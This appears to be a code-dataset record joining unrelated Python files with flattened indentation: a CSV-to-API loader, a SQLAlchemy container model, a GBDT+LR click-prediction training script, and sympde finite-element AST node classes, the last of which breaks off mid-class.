"""Builds a db column name to csv column index mapping. If no mapping file
is given, we naively create the mapping using the order of the rows.
column_map provided should be {csv column name: db column name},
not including the primary ID.
The function returns {db column name: csv column index}
"""
# Naive approach, assumes the csv column names matches the db column names
db_content_names = csv_column_names[1:]
if column_map is None:
return {
column_name: index
for index, column_name in enumerate(db_content_names, start=1)
}
if len(column_map) != len(db_content_names):
print("WARNING: The db and csv column mapping file provided are "
"mismatched in length. db column names are: "
f"\n{db_content_names}\nThe provided column mapping "
f"generated the following maping: \n{column_map}")
# Using mapping provided by user to create the mapping
db_column_to_index_map = {}
for csv_column_name, db_column_name in column_map.items():
if csv_column_name not in db_content_names:
print(f"WARNING: {csv_column_name} not part of the db column "
f"names for values {db_content_names}. This may be warning"
"may be triggered due to including the primary key in the "
"mapping file. To not have this warning printed, remove "
"that mapping entry.")
continue
db_column_to_index_map[db_column_name] = csv_column_names.index(
csv_column_name)
return db_column_to_index_map
def send_entry(
server: str, entry: List, entrymap: Dict, dry_run: bool, authkey: Dict
) -> Tuple[int, str, Dict]:
postdata = {}
for column_name, csv_index in entrymap.items():
# Skip the entry if a column identifying duplicates exists
if column_name == DUPLICATE_ARG_NAME:
if entry[csv_index]:
return 200, None, None
continue
postdata[column_name] = entry[csv_index]
print(postdata)
if not dry_run:
auth_headers = {'Authorization': 'JWT ' + authkey['access_token']}
res = requests.post(server, json=postdata, headers=auth_headers)
res_code = res.status_code
res_text = res.text
print(res_code, res_text)
else:
res_code = 200 # STATUS CODE OK
res_text = "Dry run, no response text"
return res_code, res_text, postdata
def main(argv):
authkey = None
if not argv.dry_run:
authkey = generate_authkey(
argv.auth_username, argv.auth_password, argv.auth_api)
elif not argv.server_address:
print("\nWARNING: A server address was not provided in args. "
"Only printing results locally. Use the -h arg if you don't "
"know what this means.\n")
else:
print("\nThis is a dry run. No data will be loaded to server whether "
"a server_address has been provided or not.\n")
csv_data = parse_csv_to_memory(argv.csv_path)
if argv.entrymap_path is not None:
with open(argv.entrymap_path, "r") as fp:
column_map = json.load(fp)
if argv.duplicate_column_name is not None:
column_map[argv.duplicate_column_name] = DUPLICATE_ARG_NAME
else:
column_map = None
entrymap = build_entrymap(
csv_column_names=csv_data[0],
column_map=column_map)
failed_entries = load_csv_to_db(
csv_data=csv_data,
entrymap=entrymap,
server=argv.server_address,
authkey=authkey,
dry_run=argv.dry_run)
total_failed_entries = len(failed_entries)
if total_failed_entries > 1:
print(
"\nTHERE WERE {} ENTRIES THAT FAILED TO BE PROCESSED. "
"PLEASE SEE \"{}\" TO DETERMINE IF THERE'S ANY DATA REMEDIATION "
"THAT'S NEEDED.\n".format(
total_failed_entries, argv.fail_csv_path))
write_fail_csv(failed_entries, argv.fail_csv_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Parse a specifically formatted CSV')
parser.add_argument(
'--csv_path', '-c', dest='csv_path', required=True,
help='the path to the csv file')
parser.add_argument(
'--entrymap_path', '-e', dest='entrymap_path', required=False,
default=None,
help='the path to the JSON mapping file for db column names to csv'
' column names')
parser.add_argument(
'--dry_run', '-d', dest='dry_run', action='store_true',
help='performs a dry run locally when provided with a '
'server_address')
parser.add_argument(
'--fail_csv_path', '-f', dest='fail_csv_path',
default='./failed_entires.csv',
help='the path to drop a csv with failed entries')
parser.add_argument(
'--duplicate_column_name', '-dc', dest='duplicate_column_name',
required=False, default=None,
help='The column name where duplicate is marked and skipped. If there '
'are any values within that column, it will count as a hit.')
parser.add_argument(
'--server', '-s', dest='server_address', required=False,
help='the server address for the results to be uploaded')
parser.add_argument(
'--user', '-u', dest='auth_username', required=True,
help='the username to log in to the api with')
parser.add_argument(
'--pass', '-p', dest='auth_password', required=True,
help='the password to log in to the api with')
parser.add_argument(
'--auth', '-a', dest='auth_api', required=True,
help='the auth api')
args = parser.parse_args()
main(args) | 0.592784 | 0.183996 |
import sqlalchemy as sa
from sqlalchemy.exc import IntegrityError as IntegrityError
from server.common import fm_logger
from server.dbmodule import db_base
fmlogger = fm_logger.Logging()
class Container(db_base.Base):
__tablename__ = 'container'
__table_args__ = {'extend_existing': True}
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.String, nullable=False, unique=True)
dep_target = sa.Column(sa.String)
status = sa.Column(sa.String)
output_config = sa.Column(sa.Text)
cont_store_path = sa.Column(sa.Text)
def __init__(self):
pass
@classmethod
def to_json(self, cont):
cont_json = {}
cont_json['id'] = cont.id
cont_json['name'] = cont.name
cont_json['dep_target'] = cont.dep_target
cont_json['status'] = cont.status
cont_json['output_config'] = str(cont.output_config)
cont_json['cont_store_path'] = str(cont.cont_store_path)
return cont_json
def get(self, name):
cont = ''
try:
session = db_base.get_session()
cont = session.query(Container).filter_by(name=name).first()
session.close()
except IntegrityError as e:
fmlogger.debug(e)
return cont
def get_all(self):
cont_list = ''
try:
session = db_base.get_session()
cont_list = session.query(Container).all()
session.close()
except IntegrityError as e:
fmlogger.debug(e)
return cont_list
def insert(self, cont_data):
self.name = cont_data['cont_name']
self.dep_target = cont_data['dep_target']
self.status = 'building'
self.output_config = ''
self.cont_store_path = cont_data['cont_store_path']
try:
session = db_base.get_session()
session.add(self)
session.commit()
session.close()
except IntegrityError as e:
fmlogger.debug(e)
return self.id
def update(self, cont_name, cont_data):
try:
session = db_base.get_session()
cont = session.query(Container).filter_by(name=cont_name).first()
if 'dep_target' in cont_data: cont.dep_target = cont_data['dep_target']
if 'status' in cont_data: cont.status = cont_data['status']
if 'output_config' in cont_data: cont.output_config = cont_data['output_config']
session.commit()
session.close()
except IntegrityError as e:
fmlogger.debug(e)
def delete(self, cont_name):
try:
session = db_base.get_session()
cont = session.query(Container).filter_by(name=cont_name).first()
session.delete(cont)
session.commit()
session.close()
except IntegrityError as e:
fmlogger.debug(e) | server/dbmodule/objects/container.py | import sqlalchemy as sa
from sqlalchemy.exc import IntegrityError as IntegrityError
from server.common import fm_logger
from server.dbmodule import db_base
fmlogger = fm_logger.Logging()
class Container(db_base.Base):
__tablename__ = 'container'
__table_args__ = {'extend_existing': True}
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.String, nullable=False, unique=True)
dep_target = sa.Column(sa.String)
status = sa.Column(sa.String)
output_config = sa.Column(sa.Text)
cont_store_path = sa.Column(sa.Text)
def __init__(self):
pass
@classmethod
def to_json(self, cont):
cont_json = {}
cont_json['id'] = cont.id
cont_json['name'] = cont.name
cont_json['dep_target'] = cont.dep_target
cont_json['status'] = cont.status
cont_json['output_config'] = str(cont.output_config)
cont_json['cont_store_path'] = str(cont.cont_store_path)
return cont_json
def get(self, name):
cont = ''
try:
session = db_base.get_session()
cont = session.query(Container).filter_by(name=name).first()
session.close()
except IntegrityError as e:
fmlogger.debug(e)
return cont
def get_all(self):
cont_list = ''
try:
session = db_base.get_session()
cont_list = session.query(Container).all()
session.close()
except IntegrityError as e:
fmlogger.debug(e)
return cont_list
def insert(self, cont_data):
self.name = cont_data['cont_name']
self.dep_target = cont_data['dep_target']
self.status = 'building'
self.output_config = ''
self.cont_store_path = cont_data['cont_store_path']
try:
session = db_base.get_session()
session.add(self)
session.commit()
session.close()
except IntegrityError as e:
fmlogger.debug(e)
return self.id
def update(self, cont_name, cont_data):
try:
session = db_base.get_session()
cont = session.query(Container).filter_by(name=cont_name).first()
if 'dep_target' in cont_data: cont.dep_target = cont_data['dep_target']
if 'status' in cont_data: cont.status = cont_data['status']
if 'output_config' in cont_data: cont.output_config = cont_data['output_config']
session.commit()
session.close()
except IntegrityError as e:
fmlogger.debug(e)
def delete(self, cont_name):
try:
session = db_base.get_session()
cont = session.query(Container).filter_by(name=cont_name).first()
session.delete(cont)
session.commit()
session.close()
except IntegrityError as e:
fmlogger.debug(e) | 0.282394 | 0.065815 |
import os
import pandas as pd
import lightgbm as lgb
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import log_loss
from sklearn.metrics import roc_auc_score
from sklearn.preprocessing import LabelEncoder
def process_sparse_feats(data, cols):
d = data.copy()
for f in cols:
d[f] = d[f].fillna('-1')
label_encoder = LabelEncoder()
d[f] = label_encoder.fit_transform(d[f])
return d
if __name__ == '__main__':
# 加载数据
data_file = os.path.join('../data', 'criteo_sampled_data.csv')
data = pd.read_csv(data_file)
print('raw data shape: ', data.shape)
# 清洗数据
cols = data.columns
dense_cols = [f for f in cols if f[0] == "I"]
sparse_cols = [f for f in cols if f[0] == "C"]
data = process_sparse_feats(data, sparse_cols)
print('gbdt input data shape: ', data.shape)
# 切分数据集
x_train = data[:500000]
y_train = x_train.pop('label')
x_valid = data[500000:]
y_valid = x_valid.pop('label')
# lightgbm训练模型
n_estimators = 32 # 50
num_leaves = 64
# 开始训练gbdt,50颗树,每课树64个叶节点
model = lgb.LGBMRegressor(objective='binary',
subsample=0.8,
min_child_weight=0.5,
colsample_bytree=0.8,
num_leaves=64,
learning_rate=0.1,
n_estimators=32,
random_state=2020)
model.fit(x_train, y_train,
eval_set=[(x_train, y_train), (x_valid, y_valid)],
eval_names=['train', 'val'],
eval_metric='binary_logloss',
categorical_feature=sparse_cols,
verbose=10)
# 提取叶子结点
# 得到每一条训练数据落在了每棵树的哪个叶子结点上
# pred_leaf = True 表示返回每棵树的叶节点序号
gbdt_feats_train = model.predict(x_train, pred_leaf=True)
# 打印结果的 shape:
print('gbdt output data shape with train: ', gbdt_feats_train.shape)
# 打印前3个数据:
print(gbdt_feats_train[:3])
# 同样要获取测试集的叶节点索引
gbdt_feats_valid = model.predict(x_valid, pred_leaf=True)
# 转换为LR模型的输入
# 将 50(32) 课树的叶节点序号构造成 DataFrame,方便后续进行 one-hot
gbdt_feats_name = ['gbdt_leaf_' + str(i) for i in range(n_estimators)]
df_train_gbdt_feats = pd.DataFrame(gbdt_feats_train, columns=gbdt_feats_name)
df_valid_gbdt_feats = pd.DataFrame(gbdt_feats_valid, columns=gbdt_feats_name)
train_len = df_train_gbdt_feats.shape[0]
data = pd.concat([df_train_gbdt_feats, df_valid_gbdt_feats])
print('gbdt output data shape: ', data.shape)
# 对每棵树的叶节点序号进行 one-hot
for col in gbdt_feats_name:
onehot_feats = pd.get_dummies(data[col], prefix=col)
data.drop([col], axis=1, inplace=True)
data = pd.concat([data, onehot_feats], axis=1)
# 50颗树,各64个叶子结点
print('lr input data shape: ', data.shape)
# 切分数据集
train = data[: train_len]
valid = data[train_len:]
# 开始训练lr
lr = LogisticRegression(C=5, solver='sag')
lr.fit(train, y_train)
# 计算交叉熵损失
train_logloss = log_loss(y_train, lr.predict_proba(train)[:, 1])
print('tr-logloss: ', train_logloss)
valid_logloss = log_loss(y_valid, lr.predict_proba(valid)[:, 1])
print('val-logloss: ', valid_logloss)
# AUC评估模型
auc_score = roc_auc_score(y_valid, lr.predict_proba(valid)[:, 1])
print('val-auc: ', auc_score) | recsys/rank/gbdt_lr.py | import os
import pandas as pd
import lightgbm as lgb
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import log_loss
from sklearn.metrics import roc_auc_score
from sklearn.preprocessing import LabelEncoder
def process_sparse_feats(data, cols):
d = data.copy()
for f in cols:
d[f] = d[f].fillna('-1')
label_encoder = LabelEncoder()
d[f] = label_encoder.fit_transform(d[f])
return d
if __name__ == '__main__':
# 加载数据
data_file = os.path.join('../data', 'criteo_sampled_data.csv')
data = pd.read_csv(data_file)
print('raw data shape: ', data.shape)
# 清洗数据
cols = data.columns
dense_cols = [f for f in cols if f[0] == "I"]
sparse_cols = [f for f in cols if f[0] == "C"]
data = process_sparse_feats(data, sparse_cols)
print('gbdt input data shape: ', data.shape)
# 切分数据集
x_train = data[:500000]
y_train = x_train.pop('label')
x_valid = data[500000:]
y_valid = x_valid.pop('label')
# lightgbm训练模型
n_estimators = 32 # 50
num_leaves = 64
# 开始训练gbdt,50颗树,每课树64个叶节点
model = lgb.LGBMRegressor(objective='binary',
subsample=0.8,
min_child_weight=0.5,
colsample_bytree=0.8,
num_leaves=64,
learning_rate=0.1,
n_estimators=32,
random_state=2020)
model.fit(x_train, y_train,
eval_set=[(x_train, y_train), (x_valid, y_valid)],
eval_names=['train', 'val'],
eval_metric='binary_logloss',
categorical_feature=sparse_cols,
verbose=10)
# 提取叶子结点
# 得到每一条训练数据落在了每棵树的哪个叶子结点上
# pred_leaf = True 表示返回每棵树的叶节点序号
gbdt_feats_train = model.predict(x_train, pred_leaf=True)
# 打印结果的 shape:
print('gbdt output data shape with train: ', gbdt_feats_train.shape)
# 打印前3个数据:
print(gbdt_feats_train[:3])
# 同样要获取测试集的叶节点索引
gbdt_feats_valid = model.predict(x_valid, pred_leaf=True)
# 转换为LR模型的输入
# 将 50(32) 课树的叶节点序号构造成 DataFrame,方便后续进行 one-hot
gbdt_feats_name = ['gbdt_leaf_' + str(i) for i in range(n_estimators)]
df_train_gbdt_feats = pd.DataFrame(gbdt_feats_train, columns=gbdt_feats_name)
df_valid_gbdt_feats = pd.DataFrame(gbdt_feats_valid, columns=gbdt_feats_name)
train_len = df_train_gbdt_feats.shape[0]
data = pd.concat([df_train_gbdt_feats, df_valid_gbdt_feats])
print('gbdt output data shape: ', data.shape)
# 对每棵树的叶节点序号进行 one-hot
for col in gbdt_feats_name:
onehot_feats = pd.get_dummies(data[col], prefix=col)
data.drop([col], axis=1, inplace=True)
data = pd.concat([data, onehot_feats], axis=1)
# 50颗树,各64个叶子结点
print('lr input data shape: ', data.shape)
# 切分数据集
train = data[: train_len]
valid = data[train_len:]
# 开始训练lr
lr = LogisticRegression(C=5, solver='sag')
lr.fit(train, y_train)
# 计算交叉熵损失
train_logloss = log_loss(y_train, lr.predict_proba(train)[:, 1])
print('tr-logloss: ', train_logloss)
valid_logloss = log_loss(y_valid, lr.predict_proba(valid)[:, 1])
print('val-logloss: ', valid_logloss)
# AUC评估模型
auc_score = roc_auc_score(y_valid, lr.predict_proba(valid)[:, 1])
print('val-auc: ', auc_score) | 0.466846 | 0.302945 |
from collections import OrderedDict
from itertools import product
from sympy import Basic
from sympy.core.singleton import Singleton
from sympy.core.compatibility import with_metaclass
from sympy.core.containers import Tuple
from sympy import AtomicExpr
from sympde.topology import ScalarTestFunction, VectorTestFunction
from sympde.topology import (dx1, dx2, dx3)
from sympde.topology import Mapping
from sympde.topology import SymbolicDeterminant
from sympde.topology import SymbolicInverseDeterminant
from sympde.topology import SymbolicWeightedVolume
from sympde.topology import IdentityMapping
#==============================================================================
# TODO move it
import string
import random
def random_string( n ):
chars = string.ascii_lowercase + string.digits
selector = random.SystemRandom()
return ''.join( selector.choice( chars ) for _ in range( n ) )
#==============================================================================
class ArityType(with_metaclass(Singleton, Basic)):
"""Base class representing a form type: bilinear/linear/functional"""
pass
class BilinearArity(ArityType):
pass
class LinearArity(ArityType):
pass
class FunctionalArity(ArityType):
pass
#==============================================================================
class IndexNode(with_metaclass(Singleton, Basic)):
"""Base class representing one index of an iterator"""
pass
class IndexElement(IndexNode):
pass
class IndexQuadrature(IndexNode):
pass
class IndexDof(IndexNode):
pass
class IndexDofTrial(IndexNode):
pass
class IndexDofTest(IndexNode):
pass
class IndexDerivative(IndexNode):
pass
index_element = IndexElement()
index_quad = IndexQuadrature()
index_dof = IndexDof()
index_dof_trial = IndexDofTrial()
index_dof_test = IndexDofTest()
index_deriv = IndexDerivative()
#==============================================================================
class LengthNode(with_metaclass(Singleton, Basic)):
"""Base class representing one length of an iterator"""
pass
class LengthElement(LengthNode):
pass
class LengthQuadrature(LengthNode):
pass
class LengthDof(LengthNode):
pass
class LengthDofTrial(LengthNode):
pass
class LengthDofTest(LengthNode):
pass
length_element = LengthElement()
length_quad = LengthQuadrature()
length_dof = LengthDof()
length_dof_trial = LengthDofTrial()
length_dof_test = LengthDofTest()
#==============================================================================
class RankNode(with_metaclass(Singleton, Basic)):
"""Base class representing a rank of an iterator"""
pass
class RankDimension(RankNode):
pass
rank_dim = RankDimension()
#==============================================================================
class BaseNode(Basic):
"""
"""
pass
#==============================================================================
class Element(BaseNode):
"""
"""
pass
#==============================================================================
class Pattern(Tuple):
"""
"""
pass
#==============================================================================
class IteratorBase(BaseNode):
"""
"""
def __new__(cls, target, dummies=None):
if not dummies is None:
if not isinstance(dummies, (list, tuple, Tuple)):
dummies = [dummies]
dummies = Tuple(*dummies)
return Basic.__new__(cls, target, dummies)
@property
def target(self):
return self._args[0]
@property
def dummies(self):
return self._args[1]
#==============================================================================
class TensorIterator(IteratorBase):
pass
#==============================================================================
class ProductIterator(IteratorBase):
pass
#==============================================================================
# TODO dummies should not be None
class GeneratorBase(BaseNode):
"""
"""
def __new__(cls, target, dummies):
if not isinstance(dummies, (list, tuple, Tuple)):
dummies = [dummies]
dummies = Tuple(*dummies)
if not isinstance(target, (ArrayNode, MatrixNode)):
raise TypeError('expecting an ArrayNode')
return Basic.__new__(cls, target, dummies)
@property
def target(self):
return self._args[0]
@property
def dummies(self):
return self._args[1]
#==============================================================================
class TensorGenerator(GeneratorBase):
pass
#==============================================================================
class ProductGenerator(GeneratorBase):
pass
#==============================================================================
class Grid(BaseNode):
"""
"""
pass
#==============================================================================
class ScalarNode(BaseNode, AtomicExpr):
"""
"""
pass
#==============================================================================
class ArrayNode(BaseNode, AtomicExpr):
"""
"""
_rank = None
_positions = None
_free_positions = None
@property
def rank(self):
return self._rank
@property
def positions(self):
return self._positions
@property
def free_positions(self):
if self._free_positions is None:
return list(self.positions.keys())
else:
return self._free_positions
def pattern(self, args=None):
if args is None:
args = self.free_positions
positions = {}
for a in args:
positions[a] = self.positions[a]
args = [None]*self.rank
for k,v in positions.items():
args[v] = k
return Pattern(*args)
#==============================================================================
class MatrixNode(BaseNode, AtomicExpr):
"""
"""
_rank = None
@property
def rank(self):
return self._rank
def pattern(self, positions):
raise NotImplementedError('TODO')
#==============================================================================
class GlobalTensorQuadrature(ArrayNode):
"""
"""
_rank = 2
_positions = {index_element: 0, index_quad: 1}
_free_positions = [index_element]
#==============================================================================
class LocalTensorQuadrature(ArrayNode):
# TODO add set_positions
"""
"""
_rank = 1
_positions = {index_quad: 0}
#==============================================================================
class TensorQuadrature(ScalarNode):
"""
"""
pass
#==============================================================================
class MatrixQuadrature(MatrixNode):
"""
"""
_rank = rank_dim
def __new__(cls, target):
# TODO check target
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class WeightedVolumeQuadrature(ScalarNode):
"""
"""
pass
#==============================================================================
class GlobalTensorQuadratureBasis(ArrayNode):
"""
"""
_rank = 4
_positions = {index_quad: 3, index_deriv: 2, index_dof: 1, index_element: 0}
_free_positions = [index_element]
def __new__(cls, target):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class LocalTensorQuadratureBasis(ArrayNode):
"""
"""
_rank = 3
_positions = {index_quad: 2, index_deriv: 1, index_dof: 0}
_free_positions = [index_dof]
def __new__(cls, target):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class TensorQuadratureBasis(ArrayNode):
"""
"""
_rank = 2
_positions = {index_quad: 1, index_deriv: 0}
_free_positions = [index_quad]
def __new__(cls, target):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class CoefficientBasis(ScalarNode):
"""
"""
def __new__(cls, target):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class TensorBasis(CoefficientBasis):
pass
#==============================================================================
class GlobalTensorQuadratureTestBasis(GlobalTensorQuadratureBasis):
_positions = {index_quad: 3, index_deriv: 2, index_dof_test: 1, index_element: 0}
#==============================================================================
class LocalTensorQuadratureTestBasis(LocalTensorQuadratureBasis):
_positions = {index_quad: 2, index_deriv: 1, index_dof_test: 0}
_free_positions = [index_dof_test]
#==============================================================================
class TensorQuadratureTestBasis(TensorQuadratureBasis):
pass
#==============================================================================
class TensorTestBasis(TensorBasis):
pass
#==============================================================================
class GlobalTensorQuadratureTrialBasis(GlobalTensorQuadratureBasis):
_positions = {index_quad: 3, index_deriv: 2, index_dof_trial: 1, index_element: 0}
#==============================================================================
class LocalTensorQuadratureTrialBasis(LocalTensorQuadratureBasis):
_positions = {index_quad: 2, index_deriv: 1, index_dof_trial: 0}
_free_positions = [index_dof_trial]
#==============================================================================
class TensorQuadratureTrialBasis(TensorQuadratureBasis):
pass
#==============================================================================
class TensorTrialBasis(TensorBasis):
pass
#==============================================================================
class MatrixLocalBasis(MatrixNode):
"""
used to describe local dof over an element
"""
_rank = rank_dim
def __new__(cls, target):
# TODO check target
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class StencilMatrixLocalBasis(MatrixNode):
"""
used to describe local dof over an element as a stencil matrix
"""
def __new__(cls, pads):
if not isinstance(pads, (list, tuple, Tuple)):
raise TypeError('Expecting an iterable')
pads = Tuple(*pads)
rank = 2*len(pads)
tag = random_string( 6 )
return Basic.__new__(cls, pads, rank, tag)
@property
def pads(self):
return self._args[0]
@property
def rank(self):
return self._args[1]
@property
def tag(self):
return self._args[2]
#==============================================================================
class StencilVectorLocalBasis(MatrixNode):
"""
used to describe local dof over an element as a stencil vector
"""
def __new__(cls, pads):
if not isinstance(pads, (list, tuple, Tuple)):
raise TypeError('Expecting an iterable')
pads = Tuple(*pads)
rank = len(pads)
tag = random_string( 6 )
return Basic.__new__(cls, pads, rank, tag)
@property
def pads(self):
return self._args[0]
@property
def rank(self):
return self._args[1]
@property
def tag(self):
return self._args[2]
#==============================================================================
class StencilMatrixGlobalBasis(MatrixNode):
"""
used to describe local dof over an element as a stencil matrix
"""
def __new__(cls, pads):
if not isinstance(pads, (list, tuple, Tuple)):
raise TypeError('Expecting an iterable')
pads = Tuple(*pads)
rank = 2*len(pads)
tag = random_string( 6 )
return Basic.__new__(cls, pads, rank, tag)
@property
def pads(self):
return self._args[0]
@property
def rank(self):
return self._args[1]
@property
def tag(self):
return self._args[2]
#==============================================================================
class StencilVectorGlobalBasis(MatrixNode):
"""
used to describe local dof over an element as a stencil vector
"""
def __new__(cls, pads):
if not isinstance(pads, (list, tuple, Tuple)):
raise TypeError('Expecting an iterable')
pads = Tuple(*pads)
rank = len(pads)
tag = random_string( 6 )
return Basic.__new__(cls, pads, rank, tag)
@property
def pads(self):
return self._args[0]
@property
def rank(self):
return self._args[1]
@property
def tag(self):
return self._args[2]
#==============================================================================
class GlobalSpan(ArrayNode):
"""
"""
_rank = 1
_positions = {index_element: 0}
def __new__(cls, target):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class Span(ScalarNode):
"""
"""
def __new__(cls, target=None):
if not( target is None ):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class Evaluation(BaseNode):
"""
"""
pass
#==============================================================================
class FieldEvaluation(Evaluation):
"""
"""
pass
#==============================================================================
class MappingEvaluation(Evaluation):
"""
"""
pass
#==============================================================================
class ComputeNode(Basic):
"""
"""
def __new__(cls, expr):
return Basic.__new__(cls, expr)
@property
def expr(self):
return self._args[0]
#==============================================================================
class ComputePhysical(ComputeNode):
"""
"""
pass
#==============================================================================
class ComputePhysicalBasis(ComputePhysical):
"""
"""
pass
#==============================================================================
class ComputeKernelExpr(ComputeNode):
"""
"""
pass
#==============================================================================
class ComputeLogical(ComputeNode):
"""
"""
pass
#==============================================================================
class ComputeLogicalBasis(ComputeLogical):
"""
"""
pass
#==============================================================================
class Reduction(Basic):
"""
"""
def __new__(cls, op, expr, lhs=None):
# TODO add verification on op = '-', '+', '*', '/'
return Basic.__new__(cls, op, expr, lhs)
@property
def op(self):
return self._args[0]
@property
def expr(self):
return self._args[1]
@property
def lhs(self):
return self._args[2]
#==============================================================================
class Reduce(Basic):
"""
"""
def __new__(cls, op, rhs, lhs, loop):
# TODO add verification on op = '-', '+', '*', '/'
if not isinstance(loop, Loop):
raise TypeError('Expecting a Loop')
return Basic.__new__(cls, op, rhs, lhs, loop)
@property
def op(self):
return self._args[0]
@property
def rhs(self):
return self._args[1]
@property
def lhs(self):
return self._args[2]
@property
def loop(self):
return self._args[3]
#==============================================================================
class Reset(Basic):
"""
"""
def __new__(cls, expr):
return Basic.__new__(cls, expr)
@property
def expr(self):
return self._args[0]
#==============================================================================
class ElementOf(Basic):
"""
"""
def __new__(cls, target):
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class ExprNode(Basic):
"""
"""
pass
#==============================================================================
class AtomicNode(ExprNode, AtomicExpr):
"""
"""
@property
def expr(self):
return self._args[0]
#==============================================================================
class ValueNode(ExprNode):
"""
"""
def __new__(cls, expr):
return Basic.__new__(cls, expr)
@property
def expr(self):
return self._args[0]
#==============================================================================
class PhysicalValueNode(ValueNode):
"""
"""
pass
#==============================================================================
class LogicalValueNode(ValueNode):
"""
"""
pass
#==============================================================================
class PhysicalBasisValue(PhysicalValueNode):
"""
"""
pass
#==============================================================================
class LogicalBasisValue(LogicalValueNode):
"""
"""
pass
#==============================================================================
class PhysicalGeometryValue(PhysicalValueNode):
"""
"""
pass
#==============================================================================
class LogicalGeometryValue(LogicalValueNode):
"""
"""
pass
#==============================================================================
class BasisAtom(AtomicNode):
"""
"""
def __new__(cls, expr):
ls = list(expr.atoms(ScalarTestFunction))
ls += list(expr.atoms(VectorTestFunction))
if not(len(ls) == 1):
print(expr, type(expr))
print(ls)
raise ValueError('Expecting an expression with one test function')
u = ls[0]
obj = Basic.__new__(cls, expr)
obj._atom = u
return obj
@property
def expr(self):
return self._args[0]
@property
def atom(self):
return self._atom
#==============================================================================
class GeometryAtom(AtomicNode):
"""
"""
def __new__(cls, expr):
ls = list(expr.atoms(Mapping))
if not(len(ls) == 1):
print(expr, type(expr))
print(ls)
raise ValueError('Expecting an expression with one mapping')
# TODO
u = ls[0]
obj = Basic.__new__(cls, expr)
obj._atom = u
return obj
@property
def expr(self):
return self._args[0]
@property
def atom(self):
return self._atom
#==============================================================================
class GeometryExpr(Basic):
"""
"""
def __new__(cls, expr):
# TODO assert on expr
atom = GeometryAtom(expr)
expr = MatrixQuadrature(expr)
return Basic.__new__(cls, atom, expr)
@property
def atom(self):
return self._args[0]
@property
def expr(self):
return self._args[1]
#==============================================================================
class Loop(BaseNode):
"""
class to describe a loop of an iterator over a generator.
"""
def __new__(cls, iterable, index, stmts=None):
# ...
if not( isinstance(iterable, (list, tuple, Tuple)) ):
iterable = [iterable]
iterable = Tuple(*iterable)
# ...
# ... replace GeometryExpressions by a list of expressions
others = [i for i in iterable if not isinstance(i, GeometryExpressions)]
geos = [i.arguments for i in iterable if isinstance(i, GeometryExpressions)]
with_geo = False # TODO remove
if len(geos) == 1:
geos = list(geos[0])
elif len(geos) > 1:
raise NotImplementedError('TODO')
iterable = others + geos
iterable = Tuple(*iterable)
# ...
# ...
if not( isinstance(index, IndexNode) ):
print(type(index), index)
raise TypeError('Expecting an index node')
# ...
# ... TODO - add assert w.r.t index type
# - this should be splitted/moved somewhere
iterator = []
generator = []
for a in iterable:
i,g = construct_itergener(a, index)
iterator.append(i)
generator.append(g)
# ...
# ...
iterator = Tuple(*iterator)
generator = Tuple(*generator)
# ...
# ...
if stmts is None:
stmts = []
elif not isinstance(stmts, (tuple, list, Tuple)):
stmts = [stmts]
stmts = Tuple(*stmts)
# ...
obj = Basic.__new__(cls, iterable, index, stmts)
obj._iterator = iterator
obj._generator = generator
return obj
@property
def iterable(self):
return self._args[0]
@property
def index(self):
return self._args[1]
@property
def stmts(self):
return self._args[2]
@property
def iterator(self):
return self._iterator
@property
def generator(self):
return self._generator
def get_geometry_stmts(self, mapping):
args = []
l_quad = list(self.generator.atoms(LocalTensorQuadrature))
if len(l_quad) == 0:
return Tuple(*args)
assert(len(l_quad) == 1)
l_quad = l_quad[0]
if isinstance(mapping, IdentityMapping):
args += [ComputeLogical(WeightedVolumeQuadrature(l_quad))]
return Tuple(*args)
args += [ComputeLogical(WeightedVolumeQuadrature(l_quad))]
# add stmts related to the geometry
# TODO add other expressions
args += [ComputeLogical(SymbolicDeterminant(mapping))]
args += [ComputeLogical(SymbolicInverseDeterminant(mapping))]
args += [ComputeLogical(SymbolicWeightedVolume(mapping))]
return Tuple(*args)
#==============================================================================
class TensorIteration(BaseNode):
"""
"""
def __new__(cls, iterator, generator):
# ...
if not( isinstance(iterator, TensorIterator) ):
raise TypeError('Expecting an TensorIterator')
if not( isinstance(generator, TensorGenerator) ):
raise TypeError('Expecting a TensorGenerator')
# ...
return Basic.__new__(cls, iterator, generator)
@property
def iterator(self):
return self._args[0]
@property
def generator(self):
return self._args[1]
#==============================================================================
class ProductIteration(BaseNode):
"""
"""
def __new__(cls, iterator, generator):
# ...
if not( isinstance(iterator, ProductIterator) ):
raise TypeError('Expecting an ProductIterator')
if not( isinstance(generator, ProductGenerator) ):
raise TypeError('Expecting a ProductGenerator')
# ...
return Basic.__new__(cls, iterator, generator)
@property
def iterator(self):
return self._args[0]
@property
def generator(self):
return self._args[1]
#==============================================================================
class SplitArray(BaseNode):
"""
"""
def __new__(cls, target, positions, lengths):
if not isinstance(positions, (list, tuple, Tuple)):
positions = [positions]
positions = Tuple(*positions)
if not isinstance(lengths, (list, tuple, Tuple)):
lengths = [lengths]
lengths = Tuple(*lengths)
